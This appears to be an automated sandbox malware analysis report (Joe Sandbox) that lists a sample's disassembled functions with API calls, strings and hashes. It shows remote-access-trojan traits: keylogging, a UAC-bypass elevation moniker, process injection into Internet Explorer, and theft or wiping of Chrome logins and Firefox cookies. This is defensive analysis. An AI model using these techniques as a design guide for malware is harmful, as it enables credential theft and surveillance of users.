                                      • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                      • Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                                      • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F474 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 210processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                      • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                      • API String ID: 3756808967-1743721670
                                      • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                      • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                      • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                      • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0$1$2$3$4$5$6$7$VG
                                      • API String ID: 0-1861860590
                                      • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                      • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                      • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                      • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004074FD Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 00407521
                                      • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Object_wcslen
                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                      • API String ID: 240030777-3166923314
                                      • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                      • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                      • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                      • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A748 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                      • GetLastError.KERNEL32 ref: 0041A7BB
                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                      • String ID:
                                      • API String ID: 3587775597-0
                                      • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                      • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                      • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                      • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                      • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                      • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID: lJD$lJD$lJD
                                      • API String ID: 745075371-479184356
                                      • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                      • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                      • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                      • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                      • FindClose.KERNEL32(00000000), ref: 0040C47D
                                      • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$CloseFile$FirstNext
                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                      • API String ID: 1164774033-405221262
                                      • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                      • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                      • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                      • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                      • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                      • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                      • String ID:
                                      • API String ID: 2341273852-0
                                      • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                      • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                      • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                      • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$CreateFirstNext
                                      • String ID: 8SG$PXG$PXG$NG$PG
                                      • API String ID: 341183262-3812160132
                                      • Opcode ID: c12a7a06cd91389c945adf6a1785f0550749601eff383afe73ed6c7c7bc712d6
                                      • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                      • Opcode Fuzzy Hash: c12a7a06cd91389c945adf6a1785f0550749601eff383afe73ed6c7c7bc712d6
                                      • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                      • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                      • GetLastError.KERNEL32 ref: 0040A2ED
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                      • TranslateMessage.USER32(?), ref: 0040A34A
                                      • DispatchMessageA.USER32(?), ref: 0040A355
                                      Strings
                                      • Keylogger initialization failure: error , xrefs: 0040A301
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                      • String ID: Keylogger initialization failure: error
                                      • API String ID: 3219506041-952744263
                                      • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                      • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                      • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                      • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 0040A416
                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                      • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                      • GetKeyState.USER32(00000010), ref: 0040A433
                                      • GetKeyboardState.USER32(?), ref: 0040A43E
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                      • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                      • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                      • String ID:
                                      • API String ID: 1888522110-0
                                      • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                      • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                      • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                      • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                      • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressCloseCreateLibraryLoadProcsend
                                      • String ID: SHDeleteKeyW$Shlwapi.dll
                                      • API String ID: 2127411465-314212984
                                      • Opcode ID: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                                      • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                      • Opcode Fuzzy Hash: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                                      • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00449212
                                      • _free.LIBCMT ref: 00449236
                                      • _free.LIBCMT ref: 004493BD
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                      • _free.LIBCMT ref: 00449589
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                      • String ID:
                                      • API String ID: 314583886-0
                                      • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                      • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                      • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                                      • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                        • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                        • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                        • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                        • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                      • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                      • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                      • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                      • String ID: !D@$PowrProf.dll$SetSuspendState
                                      • API String ID: 1589313981-2876530381
                                      • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                      • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                      • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                      • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                      • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                      • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP$['E
                                      • API String ID: 2299586839-2532616801
                                      • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                      • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                      • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                      • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                      • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                      • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                      • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                      • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                      Strings
                                      • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpen$FileRead
                                      • String ID: http://geoplugin.net/json.gp
                                      • API String ID: 3121278467-91888290
                                      • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                      • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                      • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                      • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                      • GetLastError.KERNEL32 ref: 0040BA58
                                      Strings
                                      • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                      • [Chrome StoredLogins not found], xrefs: 0040BA72
                                      • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                      • UserProfile, xrefs: 0040BA1E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                      • API String ID: 2018770650-1062637481
                                      • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                      • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                      • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                                      • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                      • GetLastError.KERNEL32 ref: 0041799D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3534403312-3733053543
                                      • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                      • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                      • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                      • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00409258
                                        • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                      • FindClose.KERNEL32(00000000), ref: 004093C1
                                        • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                        • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                        • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                      • FindClose.KERNEL32(00000000), ref: 004095B9
                                        • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                        • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
